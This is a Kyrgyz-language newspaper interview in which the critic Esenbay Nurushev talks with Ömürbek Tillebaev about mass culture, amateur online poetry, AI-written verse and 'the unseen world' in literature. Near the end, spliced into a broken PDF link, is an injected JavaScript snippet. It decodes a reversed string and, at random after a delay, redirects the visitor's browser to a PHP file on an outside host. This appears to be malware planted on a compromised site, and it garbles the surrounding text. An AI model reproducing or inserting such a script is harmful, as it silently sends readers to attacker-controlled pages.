“АКЫНДАРДЫН ООЗУ МЕНЕН КУДАЙЛАР СҮЙЛӨЙТ”

22-февраль, 2022-ж. / Редакция / Жаңылыктар 65

Массалык адабияттын, маданияттын кара сели каптаган азыркы заманда канткенде нукура искусствону, чыныгы  адабиятты сактап калабыз? Аны ооздуктаса болобу, же бул бүт дүйнөнү каптаган каргашабы? Белгилүү адабиятчы, сынчы Эсенбай Нурушев менен “Эркин Тоонун” маек-төрүндө ааламдашуу доорундагы учур адабиятынын ал-абалы тууралуу баарлаштык. 

Ө.Тиллебаев. Орустун улуу, классик акыны Маяковский учурунда “бизге мыкты жана ар түрдүү акындар керек” деп айткан экен. Азыр эми кыргыз поэзиясында “начар жана ар түрдүү акындар” көбөйүп кетти. Интернет сайттарды, фейсбукту карасаңыз ар бир экинчи адам ыр жазып, өзүн акын атап алды. Мындай адабият сымал, ыр сымал халтураны кантип ооздуктаса болот? Балким, союз кездегидей чыгармалардын ак-карасын, жакшы-жаманын ылгаган сынчылар жетишпей жаткандыр. Балким, буга интернет өзү себеп болуп жатабы? Бул массалык агымды кантип токтотобуз?

Э.Нурушев. Эми Өмүрбек, бул жалгыз эле кыргызга келген балакет эмес. Бул жалпы дүйнө жүзүндө ушундай процесс жүрүп жатат. Башы казандай болгон маданият ишмерлери, философдор 2000-жылдан бери ХХI кылымдын адабиятын  кантип атайбыз деп кызыл чеке болуп талашып келе жатат. Илгери постмодернизм деген агымдар болор эле. Ал эми азыркы биз жашап жаткан замандын маданиятына, адабиятына ат таба албай убара болушууда. Мындай көрүнүш поэзияда эле эмес проза, дараматургия, кино, музыка–өнөрдүн бардык салаасында орун алууда. Ошол чабуулдун бир эпкини кыргызга да тийди. Андан кыйгап өтүү мүмкүн эмес.

Ө.Тиллебаев. Макул, аны айланып өтүү мүмкүн болбосун. Бирок,  Айтматов баштаган кыргыз акын-жазуучулары дүйнөлүк маданиятка  өз салымын кошкон профессионал адабиятты жаратпадыбы. Кино, музыка да эл аралык деңгээлге чыгып, “кыргыз чудосу” деген кереметке жетишкен.  Жок дегенде ошол көркөм руханий бийиктикти сактап калсак болбойт беле?

Э.Нурушев. Туура айтасың. Өткөн кылымдын 60-жылдары чыккан таланттар биздин адабятты дүйнөлүк деңгээлге көтөрө алды. Адабияттын шарапаты менен кино, музыка, театр,  скульуптура, архитектура да жаңы бир белеске чыкты.  Бүткүл союзга таанылды.  Дүйнөгө Айтматовду бердик дегендей.

Ө.Тиллебаев. Айтыңызчы, кара таандай каптап жаткан массалык маданиятты кантип ооздуктайбыз?

Э.Нурушев. Философ Ортоге Гассет, немец ойчулу Фридрих Ницше ошол учурларда эле “Сак болгула, массалык маданият деген балээ каптап келатат. Адабиятыңды да, маданиятыңды да майкандап салат” деп эскертип айткан. Ал кезде массалык маданият деген эмне, массалык адабият деген эмне экенин эч ким жакшы аңдап билген эмес. Британиялык жазуучу  Клайв Люьистин  бир аныктамасы бар. “Массалык маданияттын өкүлдөрү аябай эле көп, бүткүл дүйнө биз үчүн жаралган, ошонун ичинде адабиятың да, маданиятың да биздики, андыктан биз түзгөн, жараткан нерселерди силер кабыл алышыңар керек” деп элге таңуулайт. Профессионалдык, элитардык адабият өзүнөн-өзү четке сүрүлө баштайт. Массалык маданият оңой, жеңил. Оюңа эмне келсе айта бересиң, жаза бересиң.

Ө.Тиллебаев. Акыркы кезде адабиятта “гонза” деген түшүнүк пайда болду. Ушуну чечмелеп кененирээк айтып берсеңиз?

Э.Нурушев. Гонза деген мээси айныган деген сөз. Ошондой адабият, маданият бизге да каптап келди. Эки саптын башын эптеп бириктирген адамдардын баары жаза баштады. Биринин артынан бири килтейген романдарды китеп кылып чыгарып жатышат. Ушул ыпыр-сыпырдын баары профессионалдык адабияттын, маданияттын кунун кетирди. Бул эми дүйнөлүк айдыңда жүрүп жаткан көрүнүш. Андан биз четтеп кала албайбыз. Поэзия деген эмне? Көркөмдүк деген эмне? Ушул күнгө чейин эч ким так, анык жооп бере элек. Гегель: «адабият, поэзия боюнча билерманмын деп эсептеген адамдан сурасаң да бир ынанарлык, оңдуу жооп бере албайт. Себеби, буга жооп табыш кыйын» дейт. Ошол мээси айныган адабият, маданият биздин кыргызга да келди. Бүт дүйнөдөгү адамзат эмнени баштан кечирип, жашап жатса кыргыздар да ошол турмушта күн кечирип жатат.

Ө.Тиллебаев. Айтыңызчы, бу массалык маданияттын апаатынан кантип арылса болот? Же, ушинтип эле саман-топону аралашып жүрө беребизби? Же ушул кыйсыпыр дүйнөнүн арасынан да эртедир-кечтир бир жакшы чыгарма жаралабы?

Э.Нурушев. Азыр эми адабият барбы, же жокпу деген маселе кырынан турууда. Бирок, кыямат кайым болсо да адабият адамзаттын турмушунда сөзсүз болот.  Адамдын табияты ушундай экен, бу дүйнө ала-салып баратса да ыр жаза берет, музыка жарала берет. Ошондуктан бу кыргыз адабияты деле бар, жок деген болбойт. Бирок, анын баары майда адабият, эргежээл маданият, колго илине турган жакшы нерсе чыкпай жатат. Азыр дүйнөдө деградация болбогон эл да жок, маданият да жок. Себеби, заман өзгөрдү.

Ө.Тиллебаев. Ооба, адамдардын  көз карашы, баалуулугу, психологиясы, түшүнүгү өзгөрдү.

Э.Нурушев. Философдор “жаңы адабият кантип келет экен, аны бешенесинде жылдызы жанган кайсы адам жаратат экен” деп күтүп отуруштун кереги жок деп айтышууда. Анткени, заман өзү ушундай болуп жатат.

Ө.Тиллебаев. Менимче, адабият менен маданиятты технологиялык прогресс, IT технология талкалады окшойт.  Анткени, чыгарма сымалдардын баары дал ушул интернет аркылуу тарап жатат.

Э.Нурушев. Туура айтасың. Адабият менен маданиятты дал ушул IT технология өлтүрдү. Азыр жасалма интеллекттер, роботтор дүйнөлүк классиктерден кем калбаган ырларды жазып жатат. Ал чыгармалардын авторун жазбай окуп көрсөң, чын эле муну Данте, же Петрарка жараткан экен деп ойлоп каласың. Ошолордун стилине, духуна окшоштуруп жазат. Жакынкы он-он беш жылдын ичинде мына бул силер сыяктуу журналисттерди, репортерлорду да робот алмаштырып калат деп жазып жатышат. Себеби, адам аралашкан жерде сөзсүз анын жеке көз карашы айтылып, бирөөсү экинчисин жамандайт. Көңүлүнө эмне туура келсе ошого ыңгайлаштырып жазат. Азыр ал турсун  кичинекей маалыматты да ошентип беришет.

Ө.Тиллебаев. Жок. Эсенбай Нурушевич, мен сиздин бул пикириңизге кошула албайм. Баары бири-бирине коендой окшош,  кунары учкан андай адабияттын, маалыматтын кимге кереги бар? Адамдын жан-дүйнөсү, руханий байлыгы кайда калат анда?

Э.Нурушев. Ооба, азыркы IT технологиянын заманында мурдагыдай калыс, обьективдүү маалыматты бериш өтө кыйын болуп калды. Мына кечээки эле Орто Азия боюнча электр жарыгы өчкөн кезде ар кайсы маалымат каражаттары, интернет сайттар ар кандай маалыматты таратышты. Бири-бирин “сен фейксиң” деп чачын жулуп жатышпайбы. Ушунун баарын азыркы заман алып келди. Бул балээден жети катмар темир коргон курсаң да коргоно албайсың. Азыр бул технология адамдын мээсин гана көчүрүп ала албай жатат. Калганынын баарын алмаштырып, жасап кое алат. Адамдын жүрөгүн, бөйрөгүн, боорун алмаштырат. Бир гана адамдын мээсин алмаштыра албай жатат. А мээң жок болсо анда сенин жан-дүйнөң да жок болот. Адамдын жан-дүйнөсүн мээ башкарып, аныктайт.

Ө.Тиллебаев. Акыркы кезде кыргыз адабиятында кайып дүйнөнү жазгандар көбөйүп жатат. Ал  турсун “Манас” дастанын да айрымдар “Кудай менин кулагыма асмандан  шыбырап айтып берди” деп жаңы варианттарын жазып чыгышты. Эми ал өзүнчө сөз. Мына кайып дүйнө деген кайдан чыкты, ушулар тууралуу сүйлөшөлү.

Э.Нурушев. Кайып дүйнө десе эле асманда арбактар келип карап турат деп түшүнүшөт. Андай эмес да. Кайып дүйнө тээ илгертен бери эле келе жаткан нерсе. Муну учурунда Платон айткан. “Вторичный мир” же “экинчи дүйнө”. Адам баласы көп замандарга чейин өзүнүн ички дүйнөсүн таанып билбей келген. Адам качан ички дүйнөсүн таанып билген учурда гана адабият, искусство, философия пайда болгон. Ага чейин сырттан уккандарынын баарын бу  Кудайдын үнү экен деп аткара берген. Гомерден,  «Одиссеядан» алып окумуштуулар жазып чыгышпадыбы. Ал  эки камералуу ойлом. Адамдын мээсинин бир жагы алган маалыматты иштеп чыгып, анан экинчи жагына берет. Экинчи жагына берген маалыматты адам аткарат экен. Анан кулагыма бирдеме угулуп кетти, көзүмө бир нерсе көрүнүп кетти деп айтып жатышпайбы, ошонун баары адамдын  ички жан-дүйнөсүнүн реакциясы.  Адам биринчи иретте өзүнүн ички туюмун аңдап билиш керек. Адабиятта муну биринчи жолу Данте, Петраркалар баштаган. Ага чейин көзүнө эмне көрүнсө ошону эле ыр кылып жаза берген. Кыргыздын акындары азырга чейин эле ошентип жазып жүрүшөт. Өзүнүн ички дүйнөсүнө үңүлүп киргенди үйрөнгөн эмес. Сократтын “Акындардын оозу менен кудайлар сүйлөйт” деген сөзү бар. ($NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/22_02.pdf»>2022-жылдын 22-февралы

Өмүрбек Тиллебаев

22-февраль, 2022-ж. / Редакция / Жаңылыктар 65
Бөлүшүү: Telegram WhatsApp X